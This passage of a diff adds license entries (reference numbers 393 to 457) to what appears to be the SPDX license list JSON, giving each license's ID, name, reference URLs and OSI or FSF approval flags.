+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-2.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-2.1.json",
+ "referenceNumber": 393,
+ "name": "Open Software License 2.1",
+ "licenseId": "OSL-2.1",
+ "seeAlso": [
+ "http://web.archive.org/web/20050212003940/http://www.rosenlaw.com/osl21.htm",
+ "https://opensource.org/licenses/OSL-2.1"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/LPPL-1.3a.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LPPL-1.3a.json",
+ "referenceNumber": 394,
+ "name": "LaTeX Project Public License v1.3a",
+ "licenseId": "LPPL-1.3a",
+ "seeAlso": [
+ "http://www.latex-project.org/lppl/lppl-1-3a.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NAIST-2003.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NAIST-2003.json",
+ "referenceNumber": 395,
+ "name": "Nara Institute of Science and Technology License (2003)",
+ "licenseId": "NAIST-2003",
+ "seeAlso": [
+ "https://enterprise.dejacode.com/licenses/public/naist-2003/#license-text",
+ "https://github.com/nodejs/node/blob/4a19cc8947b1bba2b2d27816ec3d0edf9b28e503/LICENSE#L343"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-4.0.json",
+ "referenceNumber": 396,
+ "name": "Creative Commons Attribution Non Commercial No Derivatives 4.0 International",
+ "licenseId": "CC-BY-NC-ND-4.0",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0-DE.json",
+ "referenceNumber": 397,
+ "name": "Creative Commons Attribution Non Commercial 3.0 Germany",
+ "licenseId": "CC-BY-NC-3.0-DE",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-nc/3.0/de/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LGPL-2.1+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/LGPL-2.1+.json",
+ "referenceNumber": 398,
+ "name": "GNU Library General Public License v2.1 or later",
+ "licenseId": "LGPL-2.1+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/lgpl-2.1-standalone.html",
+ "https://opensource.org/licenses/LGPL-2.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OPL-1.0.json",
+ "referenceNumber": 399,
+ "name": "Open Public License v1.0",
+ "licenseId": "OPL-1.0",
+ "seeAlso": [
+ "http://old.koalateam.com/jackaroo/OPL_1_0.TXT",
+ "https://fedoraproject.org/wiki/Licensing/Open_Public_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/HPND-sell-variant.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/HPND-sell-variant.json",
+ "referenceNumber": 400,
+ "name": "Historical Permission Notice and Disclaimer - sell variant",
+ "licenseId": "HPND-sell-variant",
+ "seeAlso": [
+ "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/sunrpc/auth_gss/gss_generic_token.c?h\u003dv4.19"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/QPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/QPL-1.0.json",
+ "referenceNumber": 401,
+ "name": "Q Public License 1.0",
+ "licenseId": "QPL-1.0",
+ "seeAlso": [
+ "http://doc.qt.nokia.com/3.3/license.html",
+ "https://opensource.org/licenses/QPL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/EUPL-1.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EUPL-1.2.json",
+ "referenceNumber": 402,
+ "name": "European Union Public License 1.2",
+ "licenseId": "EUPL-1.2",
+ "seeAlso": [
+ "https://joinup.ec.europa.eu/page/eupl-text-11-12",
+ "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/eupl_v1.2_en.pdf",
+ "https://joinup.ec.europa.eu/sites/default/files/custom-page/attachment/2020-03/EUPL-1.2%20EN.txt",
+ "https://joinup.ec.europa.eu/sites/default/files/inline-files/EUPL%20v1_2%20EN(1).txt",
+ "http://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri\u003dCELEX:32017D0863",
+ "https://opensource.org/licenses/EUPL-1.2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.2-no-invariants-or-later.json",
+ "referenceNumber": 403,
+ "name": "GNU Free Documentation License v1.2 or later - no invariants",
+ "licenseId": "GFDL-1.2-no-invariants-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.2.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/eCos-2.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/eCos-2.0.json",
+ "referenceNumber": 404,
+ "name": "eCos license version 2.0",
+ "licenseId": "eCos-2.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/ecos-license.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NCGL-UK-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NCGL-UK-2.0.json",
+ "referenceNumber": 405,
+ "name": "Non-Commercial Government Licence",
+ "licenseId": "NCGL-UK-2.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/non-commercial-government-licence/version/2/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Beerware.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Beerware.json",
+ "referenceNumber": 406,
+ "name": "Beerware License",
+ "licenseId": "Beerware",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Beerware",
+ "https://people.freebsd.org/~phk/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Open-MPI.json",
+ "referenceNumber": 407,
+ "name": "BSD 3-Clause Open MPI variant",
+ "licenseId": "BSD-3-Clause-Open-MPI",
+ "seeAlso": [
+ "https://www.open-mpi.org/community/license.php",
+ "http://www.netlib.org/lapack/LICENSE.txt"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-bison-exception.json",
+ "referenceNumber": 408,
+ "name": "GNU General Public License v2.0 w/Bison exception",
+ "licenseId": "GPL-2.0-with-bison-exception",
+ "seeAlso": [
+ "http://git.savannah.gnu.org/cgit/bison.git/tree/data/yacc.c?id\u003d193d7c7054ba7197b0789e14965b739162319b5e#n141"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-B.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-B.json",
+ "referenceNumber": 409,
+ "name": "CeCILL-B Free Software License Agreement",
+ "licenseId": "CECILL-B",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-autoconf-exception.json",
+ "referenceNumber": 410,
+ "name": "GNU General Public License v2.0 w/Autoconf exception",
+ "licenseId": "GPL-2.0-with-autoconf-exception",
+ "seeAlso": [
+ "http://ac-archive.sourceforge.net/doc/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/EPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/EPL-2.0.json",
+ "referenceNumber": 411,
+ "name": "Eclipse Public License 2.0",
+ "licenseId": "EPL-2.0",
+ "seeAlso": [
+ "https://www.eclipse.org/legal/epl-2.0",
+ "https://www.opensource.org/licenses/EPL-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-feh.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-feh.json",
+ "referenceNumber": 412,
+ "name": "feh License",
+ "licenseId": "MIT-feh",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/MIT#feh"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/RPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/RPL-1.1.json",
+ "referenceNumber": 413,
+ "name": "Reciprocal Public License 1.1",
+ "licenseId": "RPL-1.1",
+ "seeAlso": [
+ "https://opensource.org/licenses/RPL-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CDLA-Permissive-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CDLA-Permissive-1.0.json",
+ "referenceNumber": 414,
+ "name": "Community Data License Agreement Permissive 1.0",
+ "licenseId": "CDLA-Permissive-1.0",
+ "seeAlso": [
+ "https://cdla.io/permissive-1-0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Python-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Python-2.0.json",
+ "referenceNumber": 415,
+ "name": "Python License 2.0",
+ "licenseId": "Python-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/Python-2.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/MPL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MPL-1.0.json",
+ "referenceNumber": 416,
+ "name": "Mozilla Public License 1.0",
+ "licenseId": "MPL-1.0",
+ "seeAlso": [
+ "http://www.mozilla.org/MPL/MPL-1.0.html",
+ "https://opensource.org/licenses/MPL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/GFDL-1.1-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-or-later.json",
+ "referenceNumber": 417,
+ "name": "GNU Free Documentation License v1.1 or later",
+ "licenseId": "GFDL-1.1-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/diffmark.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/diffmark.json",
+ "referenceNumber": 418,
+ "name": "diffmark license",
+ "licenseId": "diffmark",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/diffmark"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/GPL-1.0+.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/GPL-1.0+.json",
+ "referenceNumber": 419,
+ "name": "GNU General Public License v1.0 or later",
+ "licenseId": "GPL-1.0+",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/old-licenses/gpl-1.0-standalone.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OpenSSL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OpenSSL.json",
+ "referenceNumber": 420,
+ "name": "OpenSSL License",
+ "licenseId": "OpenSSL",
+ "seeAlso": [
+ "http://www.openssl.org/source/license.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-1.0.json",
+ "referenceNumber": 421,
+ "name": "Open Software License 1.0",
+ "licenseId": "OSL-1.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/OSL-1.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Parity-6.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Parity-6.0.0.json",
+ "referenceNumber": 422,
+ "name": "The Parity Public License 6.0.0",
+ "licenseId": "Parity-6.0.0",
+ "seeAlso": [
+ "https://paritylicense.com/versions/6.0.0.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-1.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-1.0.json",
+ "referenceNumber": 423,
+ "name": "Affero General Public License v1.0",
+ "licenseId": "AGPL-1.0",
+ "seeAlso": [
+ "http://www.affero.org/oagpl.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/YPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/YPL-1.1.json",
+ "referenceNumber": 424,
+ "name": "Yahoo! Public License v1.1",
+ "licenseId": "YPL-1.1",
+ "seeAlso": [
+ "http://www.zimbra.com/license/yahoo_public_license_1.1.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/SSH-short.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SSH-short.json",
+ "referenceNumber": 425,
+ "name": "SSH short notice",
+ "licenseId": "SSH-short",
+ "seeAlso": [
+ "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/pathnames.h",
+ "http://web.mit.edu/kolya/.f/root/athena.mit.edu/sipb.mit.edu/project/openssh/OldFiles/src/openssh-2.9.9p2/ssh-add.1",
+ "https://joinup.ec.europa.eu/svn/lesoll/trunk/italc/lib/src/dsa_key.cpp"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/IBM-pibs.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/IBM-pibs.json",
+ "referenceNumber": 426,
+ "name": "IBM PowerPC Initialization and Boot Software",
+ "licenseId": "IBM-pibs",
+ "seeAlso": [
+ "http://git.denx.de/?p\u003du-boot.git;a\u003dblob;f\u003darch/powerpc/cpu/ppc4xx/miiphy.c;h\u003d297155fdafa064b955e53e9832de93bfb0cfb85b;hb\u003d9fab4bf4cc077c21e43941866f3f2c196f28670d"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Xnet.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Xnet.json",
+ "referenceNumber": 427,
+ "name": "X.Net License",
+ "licenseId": "Xnet",
+ "seeAlso": [
+ "https://opensource.org/licenses/Xnet"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/TU-Berlin-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/TU-Berlin-1.0.json",
+ "referenceNumber": 428,
+ "name": "Technische Universitaet Berlin License 1.0",
+ "licenseId": "TU-Berlin-1.0",
+ "seeAlso": [
+ "https://github.com/swh/ladspa/blob/7bf6f3799fdba70fda297c2d8fd9f526803d9680/gsm/COPYRIGHT"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-3.0.html",
+ "isDeprecatedLicenseId": true,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-3.0.json",
+ "referenceNumber": 429,
+ "name": "GNU Affero General Public License v3.0",
+ "licenseId": "AGPL-3.0",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/agpl.txt",
+ "https://opensource.org/licenses/AGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CAL-1.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CAL-1.0.json",
+ "referenceNumber": 430,
+ "name": "Cryptographic Autonomy License 1.0",
+ "licenseId": "CAL-1.0",
+ "seeAlso": [
+ "http://cryptographicautonomylicense.com/license-text.html",
+ "https://opensource.org/licenses/CAL-1.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/AFL-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AFL-3.0.json",
+ "referenceNumber": 431,
+ "name": "Academic Free License v3.0",
+ "licenseId": "AFL-3.0",
+ "seeAlso": [
+ "http://www.rosenlaw.com/AFL3.0.htm",
+ "https://opensource.org/licenses/afl-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/CECILL-C.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CECILL-C.json",
+ "referenceNumber": 432,
+ "name": "CeCILL-C Free Software License Agreement",
+ "licenseId": "CECILL-C",
+ "seeAlso": [
+ "http://www.cecill.info/licences/Licence_CeCILL-C_V1-en.html"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OGL-UK-3.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OGL-UK-3.0.json",
+ "referenceNumber": 433,
+ "name": "Open Government Licence v3.0",
+ "licenseId": "OGL-UK-3.0",
+ "seeAlso": [
+ "http://www.nationalarchives.gov.uk/doc/open-government-licence/version/3/"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Clear.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Clear.json",
+ "referenceNumber": 434,
+ "name": "BSD 3-Clause Clear License",
+ "licenseId": "BSD-3-Clause-Clear",
+ "seeAlso": [
+ "http://labs.metacarta.com/license-explanation.html#license"
+ ],
+ "isOsiApproved": false,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause-Modification.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-Modification.json",
+ "referenceNumber": 435,
+ "name": "BSD 3-Clause Modification",
+ "licenseId": "BSD-3-Clause-Modification",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:BSD#Modification_Variant"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.0-UK.json",
+ "referenceNumber": 436,
+ "name": "Creative Commons Attribution Share Alike 2.0 England and Wales",
+ "licenseId": "CC-BY-SA-2.0-UK",
+ "seeAlso": [
+ "https://creativecommons.org/licenses/by-sa/2.0/uk/legalcode"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Saxpath.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Saxpath.json",
+ "referenceNumber": 437,
+ "name": "Saxpath License",
+ "licenseId": "Saxpath",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Saxpath_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NLPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NLPL.json",
+ "referenceNumber": 438,
+ "name": "No Limit Public License",
+ "licenseId": "NLPL",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/NLPL"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/SimPL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/SimPL-2.0.json",
+ "referenceNumber": 439,
+ "name": "Simple Public License 2.0",
+ "licenseId": "SimPL-2.0",
+ "seeAlso": [
+ "https://opensource.org/licenses/SimPL-2.0"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/psfrag.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/psfrag.json",
+ "referenceNumber": 440,
+ "name": "psfrag License",
+ "licenseId": "psfrag",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/psfrag"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/Spencer-86.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Spencer-86.json",
+ "referenceNumber": 441,
+ "name": "Spencer License 86",
+ "licenseId": "Spencer-86",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OCCT-PL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OCCT-PL.json",
+ "referenceNumber": 442,
+ "name": "Open CASCADE Technology Public License",
+ "licenseId": "OCCT-PL",
+ "seeAlso": [
+ "http://www.opencascade.com/content/occt-public-license"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/CERN-OHL-S-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/CERN-OHL-S-2.0.json",
+ "referenceNumber": 443,
+ "name": "CERN Open Hardware Licence Version 2 - Strongly Reciprocal",
+ "licenseId": "CERN-OHL-S-2.0",
+ "seeAlso": [
+ "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/ErlPL-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/ErlPL-1.1.json",
+ "referenceNumber": 444,
+ "name": "Erlang Public License v1.1",
+ "licenseId": "ErlPL-1.1",
+ "seeAlso": [
+ "http://www.erlang.org/EPLICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/MIT-CMU.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/MIT-CMU.json",
+ "referenceNumber": 445,
+ "name": "CMU License",
+ "licenseId": "MIT-CMU",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing:MIT?rd\u003dLicensing/MIT#CMU_Style",
+ "https://github.com/python-pillow/Pillow/blob/fffb426092c8db24a5f4b6df243a8a3c01fb63cd/LICENSE"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/NIST-PD.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NIST-PD.json",
+ "referenceNumber": 446,
+ "name": "NIST Public Domain Notice",
+ "licenseId": "NIST-PD",
+ "seeAlso": [
+ "https://github.com/tcheneau/simpleRPL/blob/e645e69e38dd4e3ccfeceb2db8cba05b7c2e0cd3/LICENSE.txt",
+ "https://github.com/tcheneau/Routing/blob/f09f46fcfe636107f22f2c98348188a65a135d98/README.md"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OSL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OSL-2.0.json",
+ "referenceNumber": 447,
+ "name": "Open Software License 2.0",
+ "licenseId": "OSL-2.0",
+ "seeAlso": [
+ "http://web.archive.org/web/20041020171434/http://www.rosenlaw.com/osl2.0.html"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/APSL-2.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/APSL-2.0.json",
+ "referenceNumber": 448,
+ "name": "Apple Public Source License 2.0",
+ "licenseId": "APSL-2.0",
+ "seeAlso": [
+ "http://www.opensource.apple.com/license/apsl/"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/Leptonica.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/Leptonica.json",
+ "referenceNumber": 449,
+ "name": "Leptonica License",
+ "licenseId": "Leptonica",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Leptonica"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/PolyForm-Small-Business-1.0.0.json",
+ "referenceNumber": 450,
+ "name": "PolyForm Small Business License 1.0.0",
+ "licenseId": "PolyForm-Small-Business-1.0.0",
+ "seeAlso": [
+ "https://polyformproject.org/licenses/small-business/1.0.0"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/LiLiQ-P-1.1.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/LiLiQ-P-1.1.json",
+ "referenceNumber": 451,
+ "name": "Licence Libre du Québec – Permissive version 1.1",
+ "licenseId": "LiLiQ-P-1.1",
+ "seeAlso": [
+ "https://forge.gouv.qc.ca/licence/fr/liliq-v1-1/",
+ "http://opensource.org/licenses/LiLiQ-P-1.1"
+ ],
+ "isOsiApproved": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/NetCDF.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/NetCDF.json",
+ "referenceNumber": 452,
+ "name": "NetCDF license",
+ "licenseId": "NetCDF",
+ "seeAlso": [
+ "http://www.unidata.ucar.edu/software/netcdf/copyright.html"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/OML.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OML.json",
+ "referenceNumber": 453,
+ "name": "Open Market License",
+ "licenseId": "OML",
+ "seeAlso": [
+ "https://fedoraproject.org/wiki/Licensing/Open_Market_License"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/AGPL-3.0-or-later.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/AGPL-3.0-or-later.json",
+ "referenceNumber": 454,
+ "name": "GNU Affero General Public License v3.0 or later",
+ "licenseId": "AGPL-3.0-or-later",
+ "seeAlso": [
+ "https://www.gnu.org/licenses/agpl.txt",
+ "https://opensource.org/licenses/AGPL-3.0"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/OLDAP-2.2.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.json",
+ "referenceNumber": 455,
+ "name": "Open LDAP Public License v2.2",
+ "licenseId": "OLDAP-2.2",
+ "seeAlso": [
+ "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d470b0c18ec67621c85881b2733057fecf4a1acc3"
+ ],
+ "isOsiApproved": false
+ },
+ {
+ "reference": "https://spdx.org/licenses/BSD-3-Clause.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause.json",
+ "referenceNumber": 456,
+ "name": "BSD 3-Clause \"New\" or \"Revised\" License",
+ "licenseId": "BSD-3-Clause",
+ "seeAlso": [
+ "https://opensource.org/licenses/BSD-3-Clause"
+ ],
+ "isOsiApproved": true,
+ "isFsfLibre": true
+ },
+ {
+ "reference": "https://spdx.org/licenses/WTFPL.html",
+ "isDeprecatedLicenseId": false,
+ "detailsUrl": "https://spdx.org/licenses/WTFPL.json",
+ "referenceNumber": 457,
+ "name": "Do What The F*ck You Want To Public License",
+ "licenseId": "WTFPL",
+ "seeAlso": [
+ "http://www.wtfpl.net/about/",
